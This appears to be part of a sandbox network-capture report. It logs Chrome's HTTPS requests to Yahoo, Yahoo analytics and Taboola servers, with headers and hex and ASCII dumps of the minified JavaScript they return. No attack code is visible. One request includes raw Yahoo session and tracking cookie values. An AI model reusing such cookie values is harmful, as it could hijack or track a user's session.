                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: );throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),l=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.ke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 3b 72 65 74 75 72 6e 7b 6f 66 66 73 65 74 58 3a 65 2e 6f 66 66 73 65 74 58 2c 6f 66 66 73 65 74 59 3a 65 2e 6f 66 66 73 65 74 59 2c 74 72 69 67 67 65 72 3a 65 2e 74 72 69 67 67 65 72 7d 7d 7d 5d 29 2c 74 7d 28 76 29 3b 77 2e 65 76 65 6e 74 73 3d 7b 7d 3b 76 61 72 20 6a 3d 77 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._util;return{offsetX:e.offsetX,offsetY:e.offsetY,trigger:e.trigger}}}]),t}(v);w.events={};var j=w,m=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 69 65 77 70 6f 72 74 22 3d 3d 3d 6f 26 26 28 69 3d 6b 28 65 2c 7b 6f 66 66 73 65 74 58 3a 2d 31 2a 6e 2c 6f 66 66 73 65 74 59 3a 2d 31 2a 72 7d 2c 43 2e 76 69 65 77 70 6f 72 74 29 29 2c 69 26 26 76 2e 74 72 69 67 67 65 72 46 6f 72 45 6c 65 6d 65 6e 74 73 28 5b 65 5d 2c 7b 73 6f 75 72 63 65 3a 22 73 74 61 74 65 22 7d 29 7d 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 6d 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 68 65 63 6b 49 66 42 65 6e 6a 69 4e 61 6d 65 53 70 61 63 65 45 78 69 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iewport"===o&&(i=k(e,{offsetX:-1*n,offsetY:-1*r},C.viewport)),i&&v.triggerForElements([e],{source:"state"})},b.sync(),b}return f(t,e),m(t,[{key:"_checkIfBenjiNameSpaceExist",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 72 43 6c 61 73 73 29 2c 43 2e 65 6d 69 74 57 61 66 65 72 45 76 65 6e 74 28 22 62 65 6e 6a 69 3a 65 72 72 6f 72 22 2c 7b 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 65 2c 69 64 3a 74 7d 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6c 69 73 74 65 6e 54 6f 42 65 6e 6a 69 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 3b 69 66 28 21 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 29 7b 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 3d 21 30 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 3b 74 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rClass),C.emitWaferEvent("benji:error",{elem:n,meta:{data:e,id:t}})}}},{key:"listenToBenjiEvents",value:function(){var e=this._state;if(!e.addedListenerForbenjiEvents){e.addedListenerForbenjiEvents=!0;var t=window.benji;t.on("RENDER_SUCCEEDED",this.handle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC553INData Raw: 65 79 3a 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 44 65 62 6f 75 6e 63 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 56 61 6c 69 64 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 2c 6e 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 3b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 6e 2e 67 65 74 28 65 29 2c 6f 3d 72 2e 69 6e 73 74 61 6e 63 65 2c 69 3d 6f 2e 63 6f 6e 66 69 67 2c 61 3d 69 2e 6f 66 66 73 65 74 58 2c 73 3d 69 2e 6f 66 66 73 65 74 59 2c 66 3d 69 2e 74 72 69 67 67 65 72 3b 22 76 69 65 77 70 6f 72 74 22 3d 3d 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ey:"handleResize",value:function(){this._validateWithDebounce()}},{key:"willValidate",value:function(e){var t=[],n=this._state.elementInstances;e.forEach(function(e){var r=n.get(e),o=r.instance,i=o.config,a=i.offsetX,s=i.offsetY,f=i.trigger;"viewport"===f


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    120192.168.2.449883152.199.23.1804434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC716OUTGET /tag/opus.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: opus.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 530166
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Security-Policy: default-src https:; script-src https: 'unsafe-inline'; style-src https: 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "36fe94e917e5dc731081ce2ed65a7ca7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 24 Sep 2024 14:03:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ECAcc (lhd/35B2)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: RNZ/7FqLCqRyKJ7YLupY7mjnblY1NEI+lNworKwpXhwKIxpwuv7QtWzW4rV2B+Is/BKWXkDCGrA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: MSZAZVXMZ9JB98BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC8487INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 6d 61 74 63 68 28 2f 5b 5c 77 5d 2b 5c 2e 28 5b 5c 77 5d 2b 7c 63 6f 2e 75 6b 29 24 2f 29 5b 30 5d 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 22 22 7d 7d 3b 63 6f 6e 73 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 3d 22 29 2c 6f 3d 28 74 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 61 3d 30 3b 61 3c 6f 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){va


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    121192.168.2.44988487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC365OUTGET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: pV1EOI3D0KSuu7EqDKOYouyeiQpsziwmIQZrJD3hlxzrt6OUMXjJGLtuTW200ZgRqi2VmdG139J1MkdxckgTB+DAvrLb82Yh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 1HN68FYV710JF7TT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 21:09:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Apr 2022 16:44:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "2e3968239b770b8186bb480d513311cd"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: kGIIRCHIdgWfcr_wSmm8v8C_z6K3HVA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 331883
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 69 6d 61 67 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 29 7b 72 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 72 29 2c 65 2e 73 72 63 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 76 61 72 20 61 3d 65 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t,r){r&&e.setAttribute("srcset",r),e.src=t}function i(e,t,r){var a=e.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 3b 61 28 74 68 69 73 2c 74 29 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2c 69 3d 6e 2e 64 61 72 6b 53 72 63 73 65 74 2c 6c 3d 6e 2e 6e 61 74 69 76 65 43 6c 61 73 73 2c 75 3d 6e 2e 73 65 6c 65 63 74 6f 72 2c 66 3d 6e 2e 73 65 70 61 72 61 74 6f 72 2c 64 3d 6e 2e 73 72 63 73 65 74 2c 70 3d 6e 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 79 3d 6f 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 73 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: uments[0]:{},r=e.root,s=void 0===r?document:r;a(this,t);var n=t.prototype.configs,i=n.darkSrcset,l=n.nativeClass,u=n.selector,f=n.separator,d=n.srcset,p=n.successClass,y=o(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,{root:s,selector:u,successCl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 22 2c 64 29 7d 29 29 2c 74 2e 5f 61 64 64 45 76 65 6e 74 73 54 6f 45 6c 65 6d 65 6e 74 28 65 2c 70 2c 22 64 65 66 61 75 6c 74 22 2c 6f 29 7d 72 65 74 75 72 6e 20 61 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 43 6f 6c 6f 72 53 63 68 65 6d 61 43 68 61 6e 67 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 64 61 72 6b 6d 6f 64 65 49 6e 73 74 61 6e 63 65 73 2c 74 3d 21 30 2c 72 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 74 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 6e 3d 6f 2e 76 61 6c 75 65 3b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ",d)})),t._addEventsToElement(e,p,"default",o)}return a()})}},{key:"handleColorSchemaChange",value:function(){var e=this._state.darkmodeInstances,t=!0,r=!1,a=void 0;try{for(var o,s=e.keys()[Symbol.iterator]();!(t=(o=s.next()).done);t=!0){var n=o.value;thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 7b 65 6c 65 6d 3a 65 2c 6d 65 74 61 3a 7b 73 72 63 3a 73 2c 73 72 63 73 65 74 3a 69 7d 2c 6e 61 6d 65 3a 22 57 61 66 65 72 49 6d 61 67 65 22 2c 73 74 61 63 6b 3a 6e 75 6c 6c 7d 29 2c 77 28 74 2c 22 65 72 72 6f 72 22 2c 72 29 2c 77 28 74 2c 22 6c 6f 61 64 22 2c 76 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 6e 61 74 69 76 65 22 21 3d 3d 72 3f 28 22 69 6d 61 67 65 22 3d 3d 3d 6c 7c 7c 22 70 69 63 74 75 72 65 22 3d 3d 3d 6c 3f 6e 28 65 2c 73 2c 69 29 3a 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2b 73 2b 27 22 29 27 2c 6f 2e 5f 69 74 65 6d 4c 6f 61 64 65 64 28 65 29 29 3a 28 6f 2e 5f 61 64 64 42 6f 75 6e 64 61 72 79 53 75 63 63 65 73 73 43 6c 61 73 73 28 65 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {elem:e,meta:{src:s,srcset:i},name:"WaferImage",stack:null}),w(t,"error",r),w(t,"load",v)},v=function a(){"native"!==r?("image"===l||"picture"===l?n(e,s,i):e.style.backgroundImage='url("'+s+'")',o._itemLoaded(e)):(o._addBoundarySuccessClass(e),e.classList
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC145INData Raw: 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6e 61 74 69 76 65 22 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6c 6f 61 64 65 64 22 2c 61 6c 6c 6f 77 50 72 65 66 65 74 63 68 3a 21 30 7d 3b 76 61 72 20 4f 3d 53 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 4f 28 7b 73 65 6c 65 63 74 6f 72 3a 4f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2e 73 65 6c 65 63 74 6f 72 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Class:"wafer-img-native",successClass:"wafer-img-loaded",allowPrefetch:!0};var O=S;t.default=new O({selector:O.prototype.configs.selector})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    122192.168.2.449888151.101.193.444434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC372OUTGET /libtrc/yahooweb-network/loader.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC908INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1424302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    etag: "560de7b9275693d59dd22a114db59a5ce2371689"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    last-modified: Mon, 30 Sep 2024 16:26:54 UTC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: FjoQT7lHfhrJHdE4g2wMjrVoh98GW2KNMoz9V4OmSQiLh1c58vYlKtfU1cEWIwBd+G3s5IuZ8Ew=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-replication-status: FAILED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: PXHBPNYDGQTEG9T0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: Yaz5q8SKC8PmBN0jlFxM.gu5F7QyxC_D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-from-cache: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740045-EWR
